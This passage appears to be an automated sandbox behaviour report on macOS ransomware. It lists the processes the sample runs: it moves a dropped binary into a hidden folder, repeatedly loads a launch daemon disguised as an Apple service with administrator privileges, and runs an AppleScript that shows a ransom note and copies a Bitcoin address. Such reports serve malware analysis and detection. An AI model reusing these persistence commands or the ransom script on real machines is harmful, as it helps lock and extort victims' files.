              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 856)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 860)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 864)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /bin/sh (PID: 755)Chmod executable: /bin/chmod -> chmod +x /Library/mixednkey/toolroomdJump to behavior
              Source: /bin/sh (PID: 752)Mkdir executable: /bin/mkdir -> mkdir /Library/mixednkeyJump to behavior
              Source: /usr/bin/osascript (PID: 764)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 770)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 774)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 778)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 798)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 802)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 808)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 823)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 836)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 782)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 786)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 14 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 790)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 794)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 807)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 814)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 832)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 852)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 856)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 860)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 864)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /usr/bin/osascript (PID: 868)Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /bin/sh (PID: 765)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 767)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 771)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 772)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 775)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 776)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 779)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 780)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 799)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 800)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 803)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 804)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 810)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 812)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 824)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 825)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 837)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 838)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 783)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 784)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 787)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 788)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 791)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 792)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 795)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 796)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 809)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 811)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 815)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 816)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 833)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 834)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 853)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 854)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 857)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 858)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 861)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 862)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 865)Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 866)Launch agent/daemon started : launchctl start questd
              Source: /bin/sh (PID: 752)Shell process: mkdir /Library/mixednkeyJump to behavior
              Source: /bin/sh (PID: 753)Shell process: mv /Applications/Utils/patch /Library/mixednkey/toolroomdJump to behavior
              Source: /bin/sh (PID: 754)Shell process: rmdir /Application/UtilsJump to behavior
              Source: /bin/sh (PID: 755)Shell process: chmod +x /Library/mixednkey/toolroomdJump to behavior
              Source: /bin/sh (PID: 756)Shell process: /Library/mixednkey/toolroomdJump to behavior
              Source: /bin/sh (PID: 763)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 765)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 767)Shell process: launchctl start questd
              Source: /bin/sh (PID: 769)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 771)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 772)Shell process: launchctl start questd
              Source: /bin/sh (PID: 773)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 775)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 776)Shell process: launchctl start questd
              Source: /bin/sh (PID: 777)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 779)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 780)Shell process: launchctl start questd
              Source: /bin/sh (PID: 797)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 799)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 800)Shell process: launchctl start questd
              Source: /bin/sh (PID: 801)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 803)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 804)Shell process: launchctl start questd
              Source: /bin/sh (PID: 806)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 810)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 812)Shell process: launchctl start questd
              Source: /bin/sh (PID: 822)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 824)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 825)Shell process: launchctl start questd
              Source: /bin/sh (PID: 835)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 837)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 838)Shell process: launchctl start questd
              Source: /bin/sh (PID: 839)Shell process: osascript -e beep 18say 'Your files are encrypted' waiting until completion falseset alTitle to 'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop'set alText to 'Your files are encrypted'display alert alText message alTitle as critical buttons {'OK'}set the clipboard to '13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7'
              Source: /bin/sh (PID: 781)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 783)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 784)Shell process: launchctl start questd
              Source: /bin/sh (PID: 785)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 787)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 788)Shell process: launchctl start questd
              Source: /bin/sh (PID: 789)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 791)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 792)Shell process: launchctl start questd
              Source: /bin/sh (PID: 793)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 795)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 796)Shell process: launchctl start questd
              Source: /bin/sh (PID: 805)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 809)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 811)Shell process: launchctl start questd
              Source: /bin/sh (PID: 813)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 815)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 816)Shell process: launchctl start questd
              Source: /bin/sh (PID: 831)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 833)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 834)Shell process: launchctl start questd
              Source: /bin/sh (PID: 851)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 853)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 854)Shell process: launchctl start questd
              Source: /bin/sh (PID: 855)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 857)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 858)Shell process: launchctl start questd
              Source: /bin/sh (PID: 859)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 861)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 862)Shell process: launchctl start questd
              Source: /bin/sh (PID: 863)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 865)Shell process: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
              Source: /bin/sh (PID: 866)Shell process: launchctl start questd
              Source: /bin/sh (PID: 867)Shell process: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
              Source: /Library/mixednkey/toolroomd (PID: 756)Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
              Source: /usr/bin/osascript (PID: 763)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 763)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 769)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 769)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 773)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 773)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 777)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 777)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 797)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 797)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 801)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 801)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 806)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 806)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 822)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 822)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 835)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 835)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 839)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 839)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 781)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 781)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 785)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 785)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 789)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 789)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 793)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 793)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 805)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 805)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 813)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 813)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 831)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 831)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 851)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 851)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 855)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 855)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 859)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 859)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 863)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 863)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 867)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 867)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
              Source: /usr/bin/osascript (PID: 763)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 763)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 769)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 769)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 773)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 773)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 777)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 777)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 797)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 797)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 801)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 801)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 806)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 806)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 822)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 822)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
